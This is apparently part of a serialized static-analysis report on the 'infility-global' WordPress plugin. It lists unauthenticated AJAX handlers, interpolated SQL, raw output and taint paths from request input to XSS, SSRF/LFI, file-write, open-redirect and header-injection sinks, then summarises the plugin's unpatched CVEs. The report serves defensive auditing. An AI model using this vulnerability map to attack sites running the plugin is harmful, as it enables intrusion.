,"callback":474,"hasNonce":46,"hasCapCheck":46,"file":332,"line":455},"infility_redirect","infility_redirect_ajax",{"action":476,"nopriv":46,"callback":476,"hasNonce":46,"hasCapCheck":391,"file":337,"line":25},"install_translation",{"action":478,"nopriv":46,"callback":478,"hasNonce":46,"hasCapCheck":46,"file":337,"line":326},"open_translation",{"action":480,"nopriv":46,"callback":480,"hasNonce":46,"hasCapCheck":46,"file":337,"line":329},"translate_position",{"action":482,"nopriv":46,"callback":482,"hasNonce":46,"hasCapCheck":46,"file":345,"line":219},"infility_global_keyword_pages_ajax",{"action":482,"nopriv":391,"callback":482,"hasNonce":46,"hasCapCheck":46,"file":345,"line":436},[],[486,490,493],{"tag":487,"callback":488,"file":237,"line":489},"infility_power_by","infility_powe
r_by_html",175,{"tag":491,"callback":492,"file":320,"line":24},"infility_form","shortcode_infility_form",{"tag":494,"callback":495,"file":345,"line":266},"infility_global_keywords","shortcode_infility_global_keywords",[],42,{"dangerousFunctions":499,"sqlUsage":505,"outputEscaping":546,"fileOperations":852,"externalRequests":326,"nonceChecks":309,"capabilityChecks":329,"bundledLibraries":853},[500],{"fn":501,"file":502,"line":503,"context":504},"unserialize","widgets\\infility-import-data\\include\\PhpSpreadsheet\\src\\PhpSpreadsheet\\Worksheet\\Worksheet.php",3469,"$this->{$key} = unserialize(serialize($val));",{"prepared":506,"raw":294,"locations":507},60,[508,511,513,514,515,517,519,522,523,525,527,529,530,532,535,538,540,541,543,544],{"file":509,"line":25,"context":510},"include\\class\\db.class.php","$wpdb->query() with variable interpolation",{"file":509,"line":156,"context":512},"$wpdb->get_results() with variable interpolation",{"file":509,"line":280,"context":512},{"file":509,"line":129,"context":512},{"file":509,"line":516,"context":512},41,{"file":509,"line":518,"context":510},91,{"file":273,"line":520,"context":521},115,"$wpdb->get_var() with variable interpolation",{"file":273,"line":489,"context":521},{"file":273,"line":524,"context":521},176,{"file":273,"line":526,"context":521},216,{"file":273,"line":528,"context":521},217,{"file":312,"line":223,"context":521},{"file":312,"line":531,"context":521},54,{"file":312,"line":533,"context":534},73,"$wpdb->get_row() with variable 
interpolation",{"file":536,"line":537,"context":510},"widgets\\infility-import-data\\include\\infility-import-site.php",735,{"file":324,"line":539,"context":521},43,{"file":324,"line":506,"context":521},{"file":324,"line":542,"context":521},83,{"file":332,"line":191,"context":521},{"file":332,"line":545,"context":534},231,{"escaped":547,"rawEcho":255,"locations":548},388,[549,553,555,557,559,561,562,563,564,565,567,569,571,573,575,577,579,580,582,584,586,588,590,592,595,596,598,600,602,604,605,607,608,610,611,613,615,617,619,621,623,625,627,628,629,631,633,634,636,638,640,642,644,646,648,649,651,653,654,656,659,661,662,663,665,667,670,672,673,674,676,677,678,679,680,681,684,686,688,690,693,695,696,698,700,701,703,704,705,706,707,709,710,712,714,716,718,719,720,723,725,727,728,730,732,733,734,736,738,739,741,743,745,747,749,750,753,756,758,760,762,764,765,767,769,771,772,774,776,777,779,780,782,784,786,788,790,792,793,795,797,799,801,803,805,807,809,811,813,815,817,819,821,822,824,826,827,829,831,833,836,838,840,841,843,844,846,847,848,849,850,851],{"file":550,"line":551,"context":552},"include\\class\\str.class.php",66,"raw 
output",{"file":218,"line":554,"context":552},408,{"file":218,"line":556,"context":552},428,{"file":218,"line":558,"context":552},439,{"file":560,"line":280,"context":552},"include\\infility_guide_page.php",{"file":560,"line":191,"context":552},{"file":560,"line":387,"context":552},{"file":560,"line":506,"context":552},{"file":560,"line":551,"context":552},{"file":560,"line":566,"context":552},84,{"file":560,"line":568,"context":552},102,{"file":560,"line":570,"context":552},110,{"file":560,"line":572,"context":552},141,{"file":560,"line":574,"context":552},142,{"file":560,"line":576,"context":552},161,{"file":560,"line":578,"context":552},162,{"file":560,"line":392,"context":552},{"file":560,"line":581,"context":552},180,{"file":560,"line":583,"context":552},197,{"file":560,"line":585,"context":552},198,{"file":560,"line":587,"context":552},223,{"file":560,"line":589,"context":552},224,{"file":560,"line":591,"context":552},225,{"file":593,"line":594,"context":552},"include\\infility_setting_page.php",2,{"file":593,"line":191,"context":552},{"file":597,"line":287,"context":552},"include\\wp_infility_table.php",{"file":597,"line":599,"context":552},55,{"file":597,"line":601,"context":552},59,{"file":597,"line":603,"context":552},63,{"file":597,"line":603,"context":552},{"file":597,"line":606,"context":552},65,{"file":597,"line":606,"context":552},{"file":597,"line":609,"context":552},71,{"file":597,"line":609,"context":552},{"file":237,"line":612,"context":552},184,{"file":237,"line":614,"context":552},453,{"file":237,"line":616,"context":552},464,{"file":237,"line":618,"context":552},492,{"file":237,"line":620,"context":552},516,{"file":622,"line":497,"context":552},"update_version.php",{"file":622,"line":624,"context":552},47,{"file":622,"line":626,"context":552},50,{"file":622,"line":606,"context":552},{"file":622,"line":551,"context":552},{"file":622,"line":630,"context":552},67,{"file":622,"line":632,"context":552},68,{"file":622,"line":609,"context":552},{"file
":262,"line":635,"context":552},143,{"file":262,"line":637,"context":552},148,{"file":262,"line":639,"context":552},149,{"file":273,"line":641,"context":552},105,{"file":273,"line":643,"context":552},131,{"file":273,"line":645,"context":552},146,{"file":273,"line":647,"context":552},155,{"file":273,"line":392,"context":552},{"file":273,"line":650,"context":552},191,{"file":273,"line":652,"context":552},220,{"file":273,"line":589,"context":552},{"file":273,"line":655,"context":552},238,{"file":657,"line":658,"context":552},"widgets\\elementor-tab\\includes\\widgets\\elementor_breadcrumb.php",449,{"file":657,"line":660,"context":552},452,{"file":657,"line":660,"context":552},{"file":657,"line":614,"context":552},{"file":657,"line":664,"context":552},454,{"file":657,"line":666,"context":552},456,{"file":668,"line":669,"context":552},"widgets\\elementor-tab\\includes\\widgets\\elementor_img_silde.php",907,{"file":668,"line":671,"context":552},908,{"file":668,"line":671,"context":552},{"file":668,"line":671,"context":552},{"file":668,"line":675,"context":552},927,{"file":668,"line":675,"context":552},{"file":668,"line":675,"context":552},{"file":668,"line":675,"context":552},{"file":668,"line":675,"context":552},{"file":668,"line":675,"context":552},{"file":682,"line":683,"context":552},"widgets\\elementor-tab\\includes\\widgets\\elementor_nav_posts.php",1075,{"file":682,"line":685,"context":552},1076,{"file":682,"line":687,"context":552},1100,{"file":682,"line":689,"context":552},1125,{"file":691,"line":692,"context":552},"widgets\\elementor-tab\\includes\\widgets\\elementor_tab_html.php",1520,{"file":312,"line":694,"context":552},79,{"file":312,"line":520,"context":552},{"file":312,"line":697,"context":552},117,{"file":312,"line":699,"context":552},138,{"file":312,"line":699,"context":552},{"file":312,"line":702,"context":552},140,{"file":312,"line":574,"context":552},{"file":312,"line":574,"context":552},{"file":312,"line":252,"context":552},{"file":312,"line":255,"co
ntext":552},{"file":312,"line":708,"context":552},189,{"file":312,"line":708,"context":552},{"file":312,"line":711,"context":552},196,{"file":312,"line":713,"context":552},280,{"file":312,"line":715,"context":552},498,{"file":717,"line":412,"context":552},"widgets\\infility-form\\elementor-infility-form-widget.php",{"file":320,"line":280,"context":552},{"file":320,"line":606,"context":552},{"file":721,"line":722,"context":552},"widgets\\infility-import-data\\include\\PhpSpreadsheet\\infra\\LocaleGenerator.php",380,{"file":724,"line":416,"context":552},"widgets\\infility-import-data\\include\\PhpSpreadsheet\\samples\\Engineering\\Convert-Online.php",{"file":724,"line":726,"context":552},53,{"file":724,"line":603,"context":552},{"file":724,"line":729,"context":552},85,{"file":731,"line":458,"context":552},"widgets\\infility-import-data\\include\\PhpSpreadsheet\\samples\\Header.php",{"file":731,"line":726,"context":552},{"file":731,"line":632,"context":552},{"file":731,"line":735,"context":552},93,{"file":737,"line":23,"context":552},"widgets\\infility-import-data\\include\\PhpSpreadsheet\\samples\\index.php",{"file":737,"line":416,"context":552},{"file":740,"line":233,"context":552},"widgets\\infility-import-data\\include\\PhpSpreadsheet\\samples\\Pdf\\21e_UnusualFont_mpdf.php",{"file":742,"line":191,"context":552},"widgets\\infility-import-data\\include\\PhpSpreadsheet\\samples\\Reader2\\23_iterateRowsYield.php",{"file":744,"line":539,"context":552},"widgets\\infility-import-data\\include\\PhpSpreadsheet\\samples\\Wizards\\NumberFormat\\Accounting.php",{"file":746,"line":539,"context":552},"widgets\\infility-import-data\\include\\PhpSpreadsheet\\samples\\Wizards\\NumberFormat\\Currency.php",{"file":748,"line":566,"context":552},"widgets\\infility-import-data\\include\\PhpSpreadsheet\\src\\PhpSpreadsheet\\Calculation\\Engine\\Logger.php",{"file":748,"line":566,"context":552},{"file":751,"line":752,"context":552},"widgets\\infility-import-data\\include\\PhpSpreadsheet\
\src\\PhpSpreadsheet\\Chart\\Renderer\\JpGraphRendererBase.php",876,{"file":754,"line":755,"context":552},"widgets\\infility-import-data\\include\\PhpSpreadsheet\\src\\PhpSpreadsheet\\Helper\\Sample.php",132,{"file":754,"line":757,"context":552},187,{"file":754,"line":759,"context":552},219,{"file":754,"line":761,"context":552},243,{"file":324,"line":763,"context":552},372,{"file":324,"line":763,"context":552},{"file":324,"line":766,"context":552},391,{"file":324,"line":768,"context":552},403,{"file":324,"line":770,"context":552},420,{"file":324,"line":770,"context":552},{"file":324,"line":773,"context":552},442,{"file":324,"line":775,"context":552},504,{"file":324,"line":775,"context":552},{"file":324,"line":778,"context":552},521,{"file":324,"line":778,"context":552},{"file":324,"line":781,"context":552},534,{"file":324,"line":783,"context":552},554,{"file":332,"line":785,"context":552},237,{"file":332,"line":787,"context":552},263,{"file":332,"line":789,"context":552},265,{"file":332,"line":791,"context":552},269,{"file":332,"line":791,"context":552},{"file":332,"line":794,"context":552},285,{"file":332,"line":796,"context":552},292,{"file":332,"line":798,"context":552},295,{"file":332,"line":800,"context":552},296,{"file":332,"line":802,"context":552},298,{"file":332,"line":804,"context":552},301,{"file":332,"line":806,"context":552},320,{"file":332,"line":808,"context":552},321,{"file":332,"line":810,"context":552},358,{"file":332,"line":812,"context":552},370,{"file":332,"line":814,"context":552},376,{"file":332,"line":816,"context":552},383,{"file":332,"line":818,"context":552},384,{"file":332,"line":820,"context":552},399,{"file":332,"line":768,"context":552},{"file":332,"line":823,"context":552},404,{"file":337,"line":825,"context":552},56,{"file":337,"line":585,"context":552},{"file":337,"line":828,"context":552},334,{"file":345,"line":830,"context":552},409,{"file":345,"line":832,"context":552},443,{"file":834,"line":835,"context":552},"widgets\\keyword-p
ages\\templates\\keyword-page.php",94,{"file":834,"line":837,"context":552},178,{"file":834,"line":839,"context":552},213,{"file":368,"line":603,"context":552},{"file":842,"line":542,"context":552},"widgets\\translatepress-tools\\projects_page.php",{"file":842,"line":566,"context":552},{"file":845,"line":191,"context":552},"widgets\\translatepress-tools\\setting_page.php",{"file":845,"line":207,"context":552},{"file":845,"line":405,"context":552},{"file":845,"line":416,"context":552},{"file":845,"line":516,"context":552},{"file":845,"line":202,"context":552},{"file":845,"line":626,"context":552},174,[],[855,877,895,915,940,953,961,974,984,996,1007,1018,1028,1038,1046,1066,1081,1090,1102,1114,1122,1133,1141,1150,1158,1169,1177,1185,1203,1217,1226,1240,1248],{"entryPoint":856,"graph":857,"unsanitizedCount":594,"severity":37},"save_js_error (include\\InfilityGlobalErrorRecord.php:263)",{"nodes":858,"edges":874},[859,863,868,870],{"id":860,"type":861,"label":862,"file":218,"line":789},"n0","source","$_SERVER",{"id":864,"type":865,"label":866,"file":218,"line":791,"wp_function":867},"n1","sink","header() [Header Injection]","header",{"id":869,"type":861,"label":862,"file":218,"line":789},"n2",{"id":871,"type":865,"label":872,"file":218,"line":794,"wp_function":873},"n3","file_put_contents() [File Write]","file_put_contents",[875,876],{"from":860,"to":864,"sanitized":46},{"from":869,"to":871,"sanitized":46},{"entryPoint":878,"graph":879,"unsanitizedCount":47,"severity":37},"save_cf7_record 
(include\\InfilityGlobalErrorRecord.php:300)",{"nodes":880,"edges":891},[881,882,884,885,886,889],{"id":860,"type":861,"label":862,"file":218,"line":804},{"id":864,"type":865,"label":866,"file":218,"line":883,"wp_function":867},304,{"id":869,"type":861,"label":862,"file":218,"line":804},{"id":871,"type":865,"label":872,"file":218,"line":806,"wp_function":873},{"id":887,"type":861,"label":888,"file":218,"line":806},"n4","$_POST",{"id":890,"type":865,"label":872,"file":218,"line":806,"wp_function":873},"n5",[892,893,894],{"from":860,"to":864,"sanitized":46},{"from":869,"to":871,"sanitized":46},{"from":887,"to":890,"sanitized":46},{"entryPoint":896,"graph":897,"unsanitizedCount":914,"severity":37},"show_cf7_records (include\\InfilityGlobalErrorRecord.php:325)",{"nodes":898,"edges":911},[899,902,906,907],{"id":860,"type":861,"label":900,"file":218,"line":901},"$_GET (x2)",328,{"id":864,"type":865,"label":903,"file":218,"line":904,"wp_function":905},"file_get_contents() [SSRF\u002FLFI]",373,"file_get_contents",{"id":869,"type":861,"label":900,"file":218,"line":901},{"id":871,"type":865,"label":908,"file":218,"line":909,"wp_function":910},"echo() [XSS]",374,"echo",[912,913],{"from":860,"to":864,"sanitized":46},{"from":869,"to":871,"sanitized":46},4,{"entryPoint":916,"graph":917,"unsanitizedCount":329,"severity":37},"\u003CInfilityGlobalErrorRecord> (include\\InfilityGlobalErrorRecord.php:0)",{"nodes":918,"edges":934},[919,921,922,923,924,925,926,928,930,932],{"id":860,"type":861,"label":920,"file":218,"line":789},"$_SERVER 
(x2)",{"id":864,"type":865,"label":866,"file":218,"line":791,"wp_function":867},{"id":869,"type":861,"label":920,"file":218,"line":789},{"id":871,"type":865,"label":872,"file":218,"line":794,"wp_function":873},{"id":887,"type":861,"label":888,"file":218,"line":806},{"id":890,"type":865,"label":872,"file":218,"line":806,"wp_function":873},{"id":927,"type":861,"label":900,"file":218,"line":901},"n6",{"id":929,"type":865,"label":903,"file":218,"line":904,"wp_function":905},"n7",{"id":931,"type":861,"label":900,"file":218,"line":901},"n8",{"id":933,"type":865,"label":908,"file":218,"line":909,"wp_function":910},"n9",[935,936,937,938,939],{"from":860,"to":864,"sanitized":46},{"from":869,"to":871,"sanitized":46},{"from":887,"to":890,"sanitized":46},{"from":927,"to":929,"sanitized":46},{"from":931,"to":933,"sanitized":46},{"entryPoint":941,"graph":942,"unsanitizedCount":47,"severity":37},"add_search_from (include\\wp_infility_table.php:51)",{"nodes":943,"edges":950},[944,946,947,949],{"id":860,"type":861,"label":945,"file":597,"line":599},"$_REQUEST['page']",{"id":864,"type":865,"label":908,"file":597,"line":599,"wp_function":910},{"id":869,"type":861,"label":948,"file":597,"line":603},"$_GET[?] 
(x2)",{"id":871,"type":865,"label":908,"file":597,"line":603,"wp_function":910},[951,952],{"from":860,"to":864,"sanitized":46},{"from":869,"to":871,"sanitized":46},{"entryPoint":954,"graph":955,"unsanitizedCount":594,"severity":37},"IGP_nav_page (infility_global.php:447)",{"nodes":956,"edges":959},[957,958],{"id":860,"type":861,"label":900,"file":237,"line":658},{"id":864,"type":865,"label":908,"file":237,"line":614,"wp_function":910},[960],{"from":860,"to":864,"sanitized":46},{"entryPoint":962,"graph":963,"unsanitizedCount":206,"severity":37},"\u003CAccounting> (widgets\\infility-import-data\\include\\PhpSpreadsheet\\samples\\Wizards\\NumberFormat\\Accounting.php:0)",{"nodes":964,"edges":971},[965,967,970],{"id":860,"type":861,"label":888,"file":744,"line":966},106,{"id":864,"type":968,"label":969,"file":744,"line":966},"transform","→ log()",{"id":869,"type":865,"label":908,"file":754,"line":757,"wp_function":910},[972,973],{"from":860,"to":864,"sanitized":46},{"from":864,"to":869,"sanitized":46},{"entryPoint":975,"graph":976,"unsanitizedCount":206,"severity":37},"\u003CCurrency> (widgets\\infility-import-data\\include\\PhpSpreadsheet\\samples\\Wizards\\NumberFormat\\Currency.php:0)",{"nodes":977,"edges":981},[978,979,980],{"id":860,"type":861,"label":888,"file":746,"line":966},{"id":864,"type":968,"label":969,"file":746,"line":966},{"id":869,"type":865,"label":908,"file":754,"line":757,"wp_function":910},[982,983],{"from":860,"to":864,"sanitized":46},{"from":864,"to":869,"sanitized":46},{"entryPoint":985,"graph":986,"unsanitizedCount":206,"severity":37},"\u003CNumber> 
(widgets\\infility-import-data\\include\\PhpSpreadsheet\\samples\\Wizards\\NumberFormat\\Number.php:0)",{"nodes":987,"edges":993},[988,991,992],{"id":860,"type":861,"label":888,"file":989,"line":990},"widgets\\infility-import-data\\include\\PhpSpreadsheet\\samples\\Wizards\\NumberFormat\\Number.php",70,{"id":864,"type":968,"label":969,"file":989,"line":990},{"id":869,"type":865,"label":908,"file":754,"line":757,"wp_function":910},[994,995],{"from":860,"to":864,"sanitized":46},{"from":864,"to":869,"sanitized":46},{"entryPoint":997,"graph":998,"unsanitizedCount":206,"severity":37},"\u003CPercentage> (widgets\\infility-import-data\\include\\PhpSpreadsheet\\samples\\Wizards\\NumberFormat\\Percentage.php:0)",{"nodes":999,"edges":1004},[1000,1002,1003],{"id":860,"type":861,"label":888,"file":1001,"line":506},"widgets\\infility-import-data\\include\\PhpSpreadsheet\\samples\\Wizards\\NumberFormat\\Percentage.php",{"id":864,"type":968,"label":969,"file":1001,"line":506},{"id":869,"type":865,"label":908,"file":754,"line":757,"wp_function":910},[1005,1006],{"from":860,"to":864,"sanitized":46},{"from":864,"to":869,"sanitized":46},{"entryPoint":1008,"graph":1009,"unsanitizedCount":206,"severity":37},"\u003CScientific> (widgets\\infility-import-data\\include\\PhpSpreadsheet\\samples\\Wizards\\NumberFormat\\Scientific.php:0)",{"nodes":1010,"edges":1015},[1011,1013,1014],{"id":860,"type":861,"label":888,"file":1012,"line":506},"widgets\\infility-import-data\\include\\PhpSpreadsheet\\samples\\Wizards\\NumberFormat\\Scientific.php",{"id":864,"type":968,"label":969,"file":1012,"line":506},{"id":869,"type":865,"label":908,"file":754,"line":757,"wp_function":910},[1016,1017],{"from":860,"to":864,"sanitized":46},{"from":864,"to":869,"sanitized":46},{"entryPoint":1019,"graph":1020,"unsanitizedCount":206,"severity":37},"import_site 
(widgets\\infility-import-data\\infility-import-data.php:621)",{"nodes":1021,"edges":1026},[1022,1024],{"id":860,"type":861,"label":888,"file":324,"line":1023},634,{"id":864,"type":865,"label":903,"file":324,"line":1025,"wp_function":905},639,[1027],{"from":860,"to":864,"sanitized":46},{"entryPoint":1029,"graph":1030,"unsanitizedCount":206,"severity":37},"header_lang_301 (widgets\\infility-translate-tool\\infility-translate-tool.php:32)",{"nodes":1031,"edges":1036},[1032,1033],{"id":860,"type":861,"label":862,"file":337,"line":412},{"id":864,"type":865,"label":1034,"file":337,"line":421,"wp_function":1035},"wp_redirect() [Open Redirect]","wp_redirect",[1037],{"from":860,"to":864,"sanitized":46},{"entryPoint":1039,"graph":1040,"unsanitizedCount":206,"severity":37},"show_head (widgets\\infility-translate-tool\\infility-translate-tool.php:44)",{"nodes":1041,"edges":1044},[1042,1043],{"id":860,"type":861,"label":862,"file":337,"line":726},{"id":864,"type":865,"label":908,"file":337,"line":825,"wp_function":910},[1045],{"from":860,"to":864,"sanitized":46},{"entryPoint":1047,"graph":1048,"unsanitizedCount":47,"severity":37},"openai_text (widgets\\keyword-pages\\includes\\ajax.php:9)",{"nodes":1049,"edges":1061},[1050,1052,1054,1056,1058,1060],{"id":860,"type":861,"label":888,"file":1051,"line":191},"widgets\\keyword-pages\\includes\\ajax.php",{"id":864,"type":968,"label":1053,"file":1051,"line":191},"→ get_cache()",{"id":869,"type":865,"label":903,"file":1051,"line":1055,"wp_function":905},58,{"id":871,"type":861,"label":1057,"file":1051,"line":423},"$_POST (x2)",{"id":887,"type":968,"label":1059,"file":1051,"line":423},"→ set_cache()",{"id":890,"type":865,"label":872,"file":1051,"line":990,"wp_function":873},[1062,1063,1064,1065],{"from":860,"to":864,"sanitized":46},{"from":864,"to":869,"sanitized":46},{"from":871,"to":887,"sanitized":46},{"from":887,"to":890,"sanitized":46},{"entryPoint":1067,"graph":1068,"unsanitizedCount":47,"severity":37},"\u003Cajax> 
(widgets\\keyword-pages\\includes\\ajax.php:0)",{"nodes":1069,"edges":1076},[1070,1071,1072,1073,1074,1075],{"id":860,"type":861,"label":888,"file":1051,"line":191},{"id":864,"type":968,"label":1053,"file":1051,"line":191},{"id":869,"type":865,"label":903,"file":1051,"line":1055,"wp_function":905},{"id":871,"type":861,"label":1057,"file":1051,"line":423},{"id":887,"type":968,"label":1059,"file":1051,"line":423},{"id":890,"type":865,"label":872,"file":1051,"line":990,"wp_function":873},[1077,1078,1079,1080],{"from":860,"to":864,"sanitized":46},{"from":864,"to":869,"sanitized":46},{"from":871,"to":887,"sanitized":46},{"from":887,"to":890,"sanitized":46},{"entryPoint":1082,"graph":1083,"unsanitizedCount":206,"severity":37},"use_custom_template (widgets\\keyword-pages\\keyword-pages.php:333)",{"nodes":1084,"edges":1088},[1085,1087],{"id":860,"type":861,"label":1086,"file":345,"line":830},"$_SERVER['REQUEST_URI']",{"id":864,"type":865,"label":908,"file":345,"line":830,"wp_function":910},[1089],{"from":860,"to":864,"sanitized":46},{"entryPoint":1091,"graph":1092,"unsanitizedCount":206,"severity":37},"save_project (widgets\\translatepress-tools\\translatepress-tools.php:150)",{"nodes":1093,"edges":1100},[1094,1096],{"id":860,"type":861,"label":888,"file":1095,"line":647},"widgets\\translatepress-tools\\translatepress-tools.php",{"id":864,"type":865,"label":1097,"file":1095,"line":1098,"wp_function":1099},"wp_remote_post() [SSRF]",173,"wp_remote_post",[1101],{"from":860,"to":864,"sanitized":46},{"entryPoint":1103,"graph":1104,"unsanitizedCount":47,"severity":1113},"\u003Cwp_infility_table> 
(include\\wp_infility_table.php:0)",{"nodes":1105,"edges":1110},[1106,1107,1108,1109],{"id":860,"type":861,"label":945,"file":597,"line":599},{"id":864,"type":865,"label":908,"file":597,"line":599,"wp_function":910},{"id":869,"type":861,"label":948,"file":597,"line":603},{"id":871,"type":865,"label":908,"file":597,"line":603,"wp_function":910},[1111,1112],{"from":860,"to":864,"sanitized":46},{"from":869,"to":871,"sanitized":46},"low",{"entryPoint":1115,"graph":1116,"unsanitizedCount":13,"severity":1113},"\u003Cinfility_global> (infility_global.php:0)",{"nodes":1117,"edges":1120},[1118,1119],{"id":860,"type":861,"label":900,"file":237,"line":658},{"id":864,"type":865,"label":908,"file":237,"line":614,"wp_function":910},[1121],{"from":860,"to":864,"sanitized":391},{"entryPoint":1123,"graph":1124,"unsanitizedCount":13,"severity":1113},"CFP_setting_page (widgets\\contact-form-plugins\\contact-form-plugins.php:93)",{"nodes":1125,"edges":1131},[1126,1129],{"id":860,"type":861,"label":1127,"file":273,"line":1128},"$_GET",139,{"id":864,"type":865,"label":908,"file":273,"line":1130,"wp_function":910},192,[1132],{"from":860,"to":864,"sanitized":391},{"entryPoint":1134,"graph":1135,"unsanitizedCount":13,"severity":1113},"\u003Ccontact-form-plugins> (widgets\\contact-form-plugins\\contact-form-plugins.php:0)",{"nodes":1136,"edges":1139},[1137,1138],{"id":860,"type":861,"label":900,"file":273,"line":1128},{"id":864,"type":865,"label":908,"file":273,"line":1130,"wp_function":910},[1140],{"from":860,"to":864,"sanitized":391},{"entryPoint":1142,"graph":1143,"unsanitizedCount":13,"severity":1113},"chat_tool_setting_page 
(widgets\\infility-chat-tool\\infility-chat-tool.php:60)",{"nodes":1144,"edges":1148},[1145,1146],{"id":860,"type":861,"label":1127,"file":312,"line":990},{"id":864,"type":865,"label":908,"file":312,"line":1147,"wp_function":910},281,[1149],{"from":860,"to":864,"sanitized":391},{"entryPoint":1151,"graph":1152,"unsanitizedCount":13,"severity":1113},"\u003Cinfility-chat-tool> (widgets\\infility-chat-tool\\infility-chat-tool.php:0)",{"nodes":1153,"edges":1156},[1154,1155],{"id":860,"type":861,"label":1127,"file":312,"line":990},{"id":864,"type":865,"label":908,"file":312,"line":1147,"wp_function":910},[1157],{"from":860,"to":864,"sanitized":391},{"entryPoint":1159,"graph":1160,"unsanitizedCount":206,"severity":1113},"set_options (widgets\\infility-form\\infility-form.php:165)",{"nodes":1161,"edges":1167},[1162,1164],{"id":860,"type":861,"label":888,"file":320,"line":1163},170,{"id":864,"type":865,"label":1165,"file":320,"line":852,"wp_function":1166},"update_option() [Settings Manipulation]","update_option",[1168],{"from":860,"to":864,"sanitized":46},{"entryPoint":1170,"graph":1171,"unsanitizedCount":206,"severity":1113},"\u003Cinfility-form> (widgets\\infility-form\\infility-form.php:0)",{"nodes":1172,"edges":1175},[1173,1174],{"id":860,"type":861,"label":888,"file":320,"line":1163},{"id":864,"type":865,"label":1165,"file":320,"line":852,"wp_function":1166},[1176],{"from":860,"to":864,"sanitized":46},{"entryPoint":1178,"graph":1179,"unsanitizedCount":13,"severity":1113},"\u003Cinfility-import-data> (widgets\\infility-import-data\\infility-import-data.php:0)",{"nodes":1180,"edges":1183},[1181,1182],{"id":860,"type":861,"label":888,"file":324,"line":1023},{"id":864,"type":865,"label":903,"file":324,"line":1025,"wp_function":905},[1184],{"from":860,"to":864,"sanitized":391},{"entryPoint":1186,"graph":1187,"unsanitizedCount":13,"severity":1113},"redirect_setting_page 
(widgets\\infility-redirect\\infility-redirect.php:219)",{"nodes":1188,"edges":1199},[1189,1192,1193,1195,1196,1198],{"id":860,"type":861,"label":1190,"file":332,"line":1191},"$_GET (x7)",245,{"id":864,"type":865,"label":908,"file":332,"line":796,"wp_function":910},{"id":869,"type":861,"label":1194,"file":332,"line":798},"$_GET['page']",{"id":871,"type":865,"label":908,"file":332,"line":798,"wp_function":910},{"id":887,"type":861,"label":1197,"file":332,"line":800},"$_GET['set_type']",{"id":890,"type":865,"label":908,"file":332,"line":800,"wp_function":910},[1200,1201,1202],{"from":860,"to":864,"sanitized":391},{"from":869,"to":871,"sanitized":391},{"from":887,"to":890,"sanitized":391},{"entryPoint":1204,"graph":1205,"unsanitizedCount":13,"severity":1113},"\u003Cinfility-redirect> (widgets\\infility-redirect\\infility-redirect.php:0)",{"nodes":1206,"edges":1213},[1207,1208,1209,1210,1211,1212],{"id":860,"type":861,"label":1190,"file":332,"line":1191},{"id":864,"type":865,"label":908,"file":332,"line":796,"wp_function":910},{"id":869,"type":861,"label":1194,"file":332,"line":798},{"id":871,"type":865,"label":908,"file":332,"line":798,"wp_function":910},{"id":887,"type":861,"label":1197,"file":332,"line":800},{"id":890,"type":865,"label":908,"file":332,"line":800,"wp_function":910},[1214,1215,1216],{"from":860,"to":864,"sanitized":391},{"from":869,"to":871,"sanitized":391},{"from":887,"to":890,"sanitized":391},{"entryPoint":1218,"graph":1219,"unsanitizedCount":206,"severity":1113},"translate_position (widgets\\infility-translate-tool\\infility-translate-tool.php:149)",{"nodes":1220,"edges":1224},[1221,1223],{"id":860,"type":861,"label":888,"file":337,"line":1222},154,{"id":864,"type":865,"label":1165,"file":337,"line":647,"wp_function":1166},[1225],{"from":860,"to":864,"sanitized":46},{"entryPoint":1227,"graph":1228,"unsanitizedCount":13,"severity":1113},"\u003Cinfility-translate-tool> 
(widgets\\infility-translate-tool\\infility-translate-tool.php:0)",{"nodes":1229,"edges":1236},[1230,1231,1232,1233,1234,1235],{"id":860,"type":861,"label":862,"file":337,"line":412},{"id":864,"type":865,"label":1034,"file":337,"line":421,"wp_function":1035},{"id":869,"type":861,"label":862,"file":337,"line":726},{"id":871,"type":865,"label":908,"file":337,"line":825,"wp_function":910},{"id":887,"type":861,"label":888,"file":337,"line":1222},{"id":890,"type":865,"label":1165,"file":337,"line":647,"wp_function":1166},[1237,1238,1239],{"from":860,"to":864,"sanitized":391},{"from":869,"to":871,"sanitized":391},{"from":887,"to":890,"sanitized":391},{"entryPoint":1241,"graph":1242,"unsanitizedCount":206,"severity":1113},"\u003Ckeyword-pages> (widgets\\keyword-pages\\keyword-pages.php:0)",{"nodes":1243,"edges":1246},[1244,1245],{"id":860,"type":861,"label":1086,"file":345,"line":830},{"id":864,"type":865,"label":908,"file":345,"line":830,"wp_function":910},[1247],{"from":860,"to":864,"sanitized":46},{"entryPoint":1249,"graph":1250,"unsanitizedCount":13,"severity":1113},"\u003Ctranslatepress-tools> (widgets\\translatepress-tools\\translatepress-tools.php:0)",{"nodes":1251,"edges":1254},[1252,1253],{"id":860,"type":861,"label":888,"file":1095,"line":647},{"id":864,"type":865,"label":1097,"file":1095,"line":1098,"wp_function":1099},[1255],{"from":860,"to":864,"sanitized":391},{"summary":1257,"deductions":1258},"The \"infility-global\" plugin v2.14.61 exhibits a concerning security posture, largely due to its significant number of unprotected entry points and a history of numerous vulnerabilities.  While the plugin utilizes prepared statements for a majority of its SQL queries and has a reasonable rate of output escaping, these positive aspects are overshadowed by critical weaknesses.  The static analysis reveals a large attack surface with 35 out of 42 entry points lacking authentication checks, a major red flag for potential unauthorized access and actions. 
The presence of the `unserialize` function, even in a single call, is a known risk for deserialization vulnerabilities if its input is not strictly controlled. The one flagged call is in the bundled PhpSpreadsheet library and is applied to the output of `serialize($val)`, so its exposure depends on whether that value can be influenced by untrusted input.\n\nThe vulnerability history is particularly alarming.  With 10 known CVEs, 6 of which are currently unpatched, and a significant portion being high severity, this plugin has a demonstrated track record of being insecure. The common vulnerability types like SQL Injection, Path Traversal, XSS, and Missing Authorization directly correlate with the identified weaknesses in the static analysis, such as unprotected AJAX handlers and the potential for unsanitized input. The most recent vulnerability is dated February 2026; although that date appears to lie in the future and is likely a data artifact, it indicates a recent history of vulnerability disclosures.\n\nIn conclusion, despite some good practices in SQL and output handling, the \"infility-global\" plugin has a high-risk profile. The extensive unprotected attack surface, coupled with a persistent history of serious, unpatched vulnerabilities, makes it a significant liability for any WordPress site.  
